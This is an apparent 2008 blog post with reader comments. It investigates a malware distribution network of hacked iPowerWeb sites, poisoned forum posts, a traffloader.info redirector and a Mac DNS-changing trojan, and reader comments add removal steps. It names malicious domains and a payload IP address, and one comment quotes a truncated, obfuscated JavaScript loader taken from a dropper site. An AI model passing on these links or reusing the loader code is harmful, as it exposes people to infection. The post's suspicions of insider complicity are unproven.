So apparently, Macintosh users are now the targets of Eastern European organized crime.
First, a bit of backstory. Last December, I wrote an article about how I had done a Google search for my name and uncovered a massive hacking attack against a Web hosting company called iPowerWeb. iPower, a company in Phoenix, Arizona, has trouble securing their Web servers, and Russian organized crime can hack any Web site hosted by iPower completely at will.
That was last December. Today, as I write this, iPower still has not fixed their server security; each day, a whole crop of new Web sites hosted by iPower is hacked, and the hackers plant redirectors on the site that are designed to snare unwary visitors and send them to servers in Eastern Europe that attempt to infect users with computer viruses.
For the past couple of months, I have been emailing iPower every day with new lists of hacked Web sites they're hosting. Each day, I bug them to fix their computer security. Each day, they remove the virus redirectors that I tell them about, but they do not fix their server security; so the next day, more of their Web sites are hacked. Some poor sots who host Web sites with iPower have had their sites hacked over and over again.
In the past 48 hours, the nature of the hacks has changed. Between December and now, the hacks were all the same; the hackers would penetrate an iPower Web site, create a directory on the site named /her, create a directory on the site named /bad, and then create a directory with a one or two digit number as a name. The redirector pages would go in the numered directory. This made spotting hacked iPower Web sites trivially easy.
About two days ago, the hackers began changing the naming scheme of the directory. This led me on a path to discovering an entire network of compomised Web sites, feeding into an elaborate underground network of computers used to distribute computer viruses.
And they're distributing Mac viruses now, too.
If you haven't read the earlier post that I linked to above, now would be a good time to do so. It's OK, I'll wait.
Back? Good. Until a couple days ago, finding the hacked sites on iPower was a breeze, because the directory structure was always the same and the hackers used the same keywords to try to poison Google searches. Now, however, the hackers have changed the naming structure of the directories, and they are no longer using the same keywords to try to snare Google searches. They're not using my name often any more, for example.
They are using a number of sex and porn-related keywords, though, some of whihc are very unusual. The Google cache of hacked iPower Web sites provides an easy way to compile lists of words and phrases that are common to all the hacked sites, and searching on Google for these words and phrases yields a treasure trove of Web sites that have been hacked.
Interestingly, these words and phrases also show up in many, many forum posts, almost all of them on forums running phpBB or phpNuke software, and invariably old, insecure versions of this software.
It also produces lists of domains with strange names, such as http://6.bgmww-news.info and http://3.vxwzj-news.info,
WARNING *** WARNING *** WARNING
The links here and elsewhere in this post are live. As of the time of this writing, they redirect to active virus distributors which can and will infect unpatched Windows computers, and in one case will try to infect Mac computers, with a virus. DO NOT click on these links if you don't know what you're doing. DO NOT allow any of these sites to download or install software onto your computer.
So we see a pattern: certain words and phrases, appearing over and over again in hacked Web sites hosted by iPowerWeb, and also appearing in messages placed on hacked phpBB and phpNuke forums, and also appearing in domains with strange names.
In each case, visiting one of the hacked iPower Web sites, reading one of the messages in a hacked forum, or visiting one of the strange domains does the same thing. And, interestingly, it reveals an elaborate network of computers all intended to transmit viruses while obscuring the source of the viruses. Ready to go down the rabbit hole? Here we go!
The central lynchpin of the entire network is a site called traffloader.info. Traffloader.info is a Web site
But all the hacked iPower Web sites, all the messages placed on hacked forums,a nd all the strange domains that are hosted by leaseweb.com all redirect to traffloader.info. Specifically, they redirect to a script on traffloader.info called "go.php". Here's how it works.
A person does a Google search for certain comon, popular keywords. It might be my name, or "free sex movies," or "build ultralight helicopters"--they create hundreds of thousands of lists of popular keywords, which they place on hacked Web sites, into hacked message board posts, or onto domains they either create or hack.
The person sees one of the attack pages in Google and clicks on the Google result. The page or message board post redirects the user to http://traffloader.info/go.php, and usually includes information about where the user came from, presumably so the hackers can tell which particular hacked sites are most effective. The information passed to the script varies, but often includes the name of the hacked site the user came from, and the Google keywords used.
Traffloader.info then redirects the user to any one of a bunch of other sites. These other sites might look like porn sites, and try to download a virus disguised as movie player software. They might look like virus scanner sites,and try to download a virus disguised as antivirus software. Sometimes, the sites have embedded iFrames or redirectors that will try to download additional files to the user's computer.
I've spent hours tracing the way the system works. Here's a bird's eye overview:
A user clicks on a Google search that leads to a hacked iPower site, a hacked forum post, or a domain hosted by leaseweb.com. The user is redirected to traffloader.info, which records information about where the user came from and what keywords he used. The script at traffloader.info then sends the user to a site such as
adult-youtube-8.com/freemovie/234/0
or
xpantivirus.com/2008/3/_freescan.php
which attempts to download a virus.
The site that the user ends up on seems to be chosen more or less at random (at least if there's a system behind it, I haven't been able to figure out what that system is yet). Some of the sites are more sophisticated than others; some of the sites redirect the user to other sites. For example, traffloader.info will sometimes send the user to a script hosted at chillyclips.com/movie1.php which will in turn send the user to movstube.com/movie1.php.
Now, movstube.com is a particularly interesting payload site. Unlike all the other sites, it attempts to attack both Mac and Windows machines; all the other sites host Windows-specific attacks.
The script at movstube.com checks the browser's "user agent". For folks who don't know a lot about how browsers work, each time your Web browser accesses a Web site, it tells the site what it is and what kind of computer you have. When you go to a Web site, your browser might say "Hi there! I'm Internet Explorer 7 running on Windows XP" or "Hello! I'm Safari running on an Intel Mac".
The script at movstube.com looks at this user agent. If it sees a Windows user agent, it attempts to download a Windows virus pretending to be movie viewer software, just like many of the other sites do.
But...
But if the script sees a Mac user agent, it sends the browser to
http://64.28.178.27/download/1023.d
The file 1023.dmg is a Macintosh disk image file. It contains an installer that attempts to install a piece of Mac malware variously called OSX/DNSChanger or OSX.RSPlug.A. This is a Trojan horse that attempts to modify the Mac's domain name server settings so that a Mac user who surfs the Web can be secretly redirected to sites controlled by the Russian malware writers, without knowing it.
The good news is that the Mac malware can not infect a computer without help. You must choose to install it and you must type your administrator password in order to be infected. The bad news: clearly, the Mac is now on the radar of malware writers.
Some of the sites in the network controlled by traffloader.info are believed or known to be associated with the Russian Business Network, an organized group of Eastern European criminals. The fact that the attacks on iPower use payload sites known or believed to be controlled by RBN suggests strongly that RBN is behind the iPower hacks. It also suggests strongly that RBN is either responsible for or associated with the people responsible for the Mac malware.
I first notified iPower that their Web server security had been breached last December. As of today, there are still new hacked sites appearing on their servers daily.
The whois information shows something very interesting, as well. All of these computers associated with virus distribution -- traffloader.info, movstube.com, xpantivirus.com, chillyclips.com, magicporntube.com, and so on--every one, without exception, is registered by the same registrar: a place called estdomains.com. Each of these Web sites is known to be associated with virus distribution on behalf of organized crime, yet each of them is still active and resolving, and each has the same registrar.
Yep, that's estdomains.com - the choice of organized crime.
Profile
![[info]](http://l-stat.livejournal.com/img/userinfo.gif)
tacit- Franklin
- Franklin's Home Page
Comments
Now, the question is: what can IPowerWeb (and other hosts) do to fix their security?
How can other hosts be affected by the same kinds of problems?
I have my own theories, here.
-Dan
The owners of phpBB and phpNuke sites need only update their software as new patches come out; the phpBB systems that have been compromised in particular are generally running very old versions of phpBB, and in a lot of cases the sites seem to have been abandoned entirely.
At this point, given that no ISP save for iPower seems to have suffered the large-scale, systematic breach iPower has encountered, I am beginning to believe that someone within iPower is responsible for, or at least complicit in, the attack.
The "scripts" here are PHP scripts living on the servers, not Javascripts that are run inside the browser; disabling Javascript in Firefox won't prevent a server-side PHP script from running.
The virus dropper Web sites attempt a number of different exploits, mostly targeted at Explorer vulnerabilities. I don't know if they target Firefox vulnerabilities; I haven't analyzed their behavior using Firefox. In any event, if the attempted exploits don't work, the virus droppers try to trick you into downloading the virus manually; this is a social engineering attack and it doesn't matter what browser you use.
Edited at 2008-03-26 07:41 pm (UTC)
Seems a rather 2-bit operation, though. Makes sense to add people who know each other, since that's how trust-based things like LJ (and Google) work, but why only 200? Why not 2000?
For those who may not know; the trick it's using right now is posting a "podcast video" with a spinning line wheel in the center, imitating "video loading" from YouTube; if you click on the supposed "stop" button it takes you to the new site. The entire thing is only an image which is hiding the link.
Edited at 2008-03-26 10:31 pm (UTC)
The Mac version of this malware can not infect you if you do not type your password. However, if you're still nervous, there's an easy way to check for it.
Open your hard drive. On the top level of your hard drive, you will see a folder called Library. Open it. Inside, look for the folder called Internet Plugins. Open the Internet Plugins folder and see if you can find a file called plugins.settings; if you can, you are infected and if you can't you are not.
If you are infected:
1. Drag the plugins.settings file to the trash and empty the trash.
2. Open the Terminal. It is in your Applications folder, in a folder called Utilities.
3. In the Terminal window, type
sudo crontab -l
and hit return. (Note, the thing after the dash is the lowercase letter L, not the number 1.) You will be asked for an administrator password. Enter it.
4. If it says "crontab: no crontab for root" when you enter your password, you are no longer infected and you can stop here. If it says anything else besides "crontab: no crontab for root" then go on to the next step.
5. Type
sudo crontab -r
in the terminal and press Return. When you are asked for your password, enter it.
6. Restart your Mac. That should take care of it.
I'm currently running my damn-near-bulletproof investigatory DreamLinux 2, having a look at page sources and such.
It shouldn't be too hard to get the physical location of these servers, I don't think.
how in the world do you have time for your LIFE???!!!???
Nice penguin, *good* penguin!
I was reading a lot about Russian and chinese networks been a complete hard to track networks as they seems like the far west (no law). Also we notices Turkey AIH networks as potentially damaging networks but, leaseweb.com seems to be a amsterdam network,. I can´t understand why an european network like that can have that kind of stuff and allows that kind of hosts on their networks, Do we have here also another potential network like RBN / CN or AIH networks? are leaseweb.com aware of this kind of criminal issues, more complex, are they allowing intentionally this kind of exploits???
I need to know if there is a relationship between RBN Networks, CN, AIH, and leaseweb.com Can we confirm this point?
Good job with the explanation. I was little bit confused with the complexity but now i see it clear...
Do you know which people can be involved on such things like this? any hackers group behind? any fake "security company"?
I would like if there's somebody who can give as much information of their observations as they can to be prepared and to allow us to defend ourselves from this hustlers....
Thanks again and Good Job !
I got more info, does anyone make sense about this code:
??
(i modified the index.html reply on rabegin-dot-cn/fel that showed like this:
but changing the annoying whitout sense unknown letters with more comfortable names (a function instead ivcmkcvztzt is called now fun1 and so on.. Maybe a web developer can explain to us what it does?
Also i noticed something strange, this virus dropper web also has another entry point, same ip address but with different hostheader it has a index.html login and password web:
http://lotrain.cn
¿Maybe a control panel for the virus dropper host?
What do you think about it?
I now changed the script tag with a $cript tag, and for with f0r, and < with #minorthan# ... in order to don´t be assumed as code, i hope it works:
Malicious code:
<$cript type="text/javascript">
function ivcmkcvztzt(utxqdyryr){
var tgywcyqbsz="";
f0r(kokecbksrt=0;kokecbksrt#minorthan#ut
tgywcyqbsz+=(String.fromCharCode(parseIn
}
document.write(tgywcyqbsz);
}
ivcmkcvztzt("");
Easy to understand code:
<$cript type="text/javascript">
function fun1(param4fun1){
var var1="";
f0r(increment1=0;increment1#minorthan#pa
var1+=(String.fromCharCode(parseInt(para
}
document.write(var1);
}
fun1("");
I hope now this works,.
Regards, and sorry for this, not so comfortable with these stuff :-)
RCB
So anyway, I did the thing in terminal and it showed I was infected and then I followed your instructions and it said the no contrab thing so it should mean I'm clean. Is there anyway that this program is still operating on my computer and anything more I should do to ensure it's gone?
Thanks for allowing idiots and computer illiterates like myself to post here and ask for help.
This malware does not attempt to spread itself or email or IM any of your contacts.
If you are not showing the signs of malware infection any more, you're good to go. :)
Help? x.x;
However, for peace of mind, I would recommend running an online antivirus scanner, such as the one at
http://housecall.trendmicro.com
Like a fool, I downloaded the malware, and I found that I had been infected.
However, I am now dis-infected ollowing your instructions, thank God.
I am very grateful.
*bookmarked*
I tried crontab it showed no crontab for root but I think i was logged in as root/admin.
I don't see a plugins.settings file in the plug-ins folder either.
Any help?
New Safari update + restart has not corrected the problem.
There are a few things you can do to resolve problems with Safari not showing movies:
1. Re-download and re-install QuickTime. You can find the download page here.
2. Install Flip4Mac, which allows Safari to play Windows (.wmv and .avi) movies. You can find the Flip4Mac download here.
3. Re-install the Flash player plugin; you need this to view Flash movies. You can find it here.
It's affecting my search results and when I click on some links it's directing me to to their dumbass sites.
Could someone please tell us how to remove 1023.dmg
Thanks
If you are infected:
1. Drag the plugins.settings file to the trash and empty the trash.
2. Open the Terminal. It is in your Applications folder, in a folder called Utilities.
3. In the Terminal window, type
sudo crontab -l
and hit return. (Note, the thing after the dash is the lowercase letter L, not the number 1.) You will be asked for an administrator password. Enter it.
4. If it says "crontab: no crontab for root" when you enter your password, you are no longer infected and you can stop here. If it says anything else besides "crontab: no crontab for root" then go on to the next step.
5. Type
sudo crontab -r
in the terminal and press Return. When you are asked for your password, enter it.
6. Restart your Mac. That should take care of it.
Thanks everyone